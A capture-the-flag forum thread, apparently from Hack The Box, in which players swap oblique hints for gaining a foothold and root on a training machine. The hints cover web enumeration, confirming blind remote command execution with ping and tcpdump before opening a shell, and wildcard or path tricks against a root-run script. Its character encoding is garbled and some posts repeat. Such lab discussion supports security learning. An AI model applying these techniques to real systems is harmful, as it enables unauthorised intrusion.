Iâm lost on the priv esc to root. I thought it the issue was going to be something âwildâ with the âextractionâ or something down the wrong binary âpathâ, but I cannot get either of those two attack vectors to work correctly. I also cannot locate the âscriptâ that is actually doing any of this so my attempts are blind. Where did I go wrong?
EDIT: Got it. Thanks @DaChef 's comment pointed me in the right direction. If you cannot get wild maybe you can have it look someplace else
As some people say in this thread it is necessary to search the Login Page, but it is not necessary to use Hydra or Bruteforce for the password, what you are looking for is in the Blackhat HSâŚ
User:
Actually I could not with the initial flag, but maybe it could be trying, trying and trying âŚ? Or maybe you have to search for âsomethingâ on the server that allows me to be G ** (any hint?)
Root
I saw this escalation method on another machine, itâs all about looking for an unusual file on the server, using a privilege escalation enumeration script and youâll notice something strange
As some people say in this thread it is necessary to search the Login Page, but it is not necessary to use Hydra or Bruteforce for the password, what you are looking for is in the Blackhat HSâŚ
User:
Actually I could not with the initial flag, but maybe it could be trying, trying and trying âŚ? Or maybe you have to search for âsomethingâ on the server that allows me to be G ** (any hint?)
Root
I saw this escalation method on another machine, itâs all about looking for an unusual file on the server, using a privilege escalation enumeration script and youâll notice something strange
The initial foothold and Getting user eats most of the time. Getting user has more struggle than root. Also, with all the resets on the free server, maintaining shell was tough.
Overall, Okay-ish machine. Well, In the end, learned something new. Pm for hints if needed.
It took me quite a while to finish this box, mostly because I got very fed up with constant resets and having to go through all steps to get a shell again⌠Even on VIP, this kinda ruined the fun for me.
The initial steps of the box arenât that realistic, but overall itâs still pretty kinda educational as it touches several techniques and thereâs different ways of getting root.
For foothold&user: make sure you enum the website properly. The site isnât actually big and what youâre looking for stands out a lot, so this really shouldnât be an issue. Then, use the hint that has been given earlier regarding âbeing evilâ. Then, continue enumerating.
For root: There is something going on in your home folder (which is pretty easy to find as your home folder isnât so big). Find out whatâs triggering it, go through it properly and think of ways to exploit it.
Anyone care to answer a question about intial foothold Im 99.9% sure I know where Im supposed to be looking but it wonât workâŚI have reset the box also
@hray & @iCk read the POC and understand it. then just try getting RCE in various ways. always start with the command PING IP since it has no special characters and you can confirm you have RCE with it (tcpdump for ping on your local host). once you get ping to work, you know you have RCE and can work on a shell from there. iâm not 100% sure, but I think if you do ping without -c 1 it hangs the server, so better to add that just incase, so you dont have to revert. I also believe the webshells spawned hangs the server as well, resulting in all the reverts
@cpazzolin said:
I think someone put the root and user flag readable for everyone
âŚ
now that I get the box, I understand that this is one of the great defects of this box. Iâm sure that many, like me, will end up getting on the flag effortlessly because of this
Given that the machines are shared, its to be expected. whenever i get a root trivially, I always revert, and try to exploit again, just to be sure I got it the intended way. if not, then ill know once I revert, and I can give it a go without âan assistâ.
@cpazzolin said:
I think someone put the root and user flag readable for everyone
âŚ
now that I get the box, I understand that this is one of the great defects of this box. Iâm sure that many, like me, will end up getting on the flag effortlessly because of this
Given that the machines are shared, its to be expected. whenever i get a root trivially, I always revert, and try to exploit again, just to be sure I got it the intended way. if not, then ill know once I revert, and I can give it a go without âan assistâ.
Yeah, I always take great care to reset boxes when I finish if I do something messy like that.
Can someone help me on the privesc? I am really trying to be wild, but it is not working for me. If possible, i want to discuss my findings so far. I really appreciate clarifications. Tks
@madcap said: @Sh11td0wn Iâm already logged in as g******. Iâm stucked on second step, tried RCE based on a know vuln. but not working.
Start simpler and work your way up. If you actually read the article, it basically walks you through it step by step. If all you do is copy and paste, and skip steps to try to jump straight to a reverse shell, youâre more likely to screw something up and itâs much harder to debug and find your errors.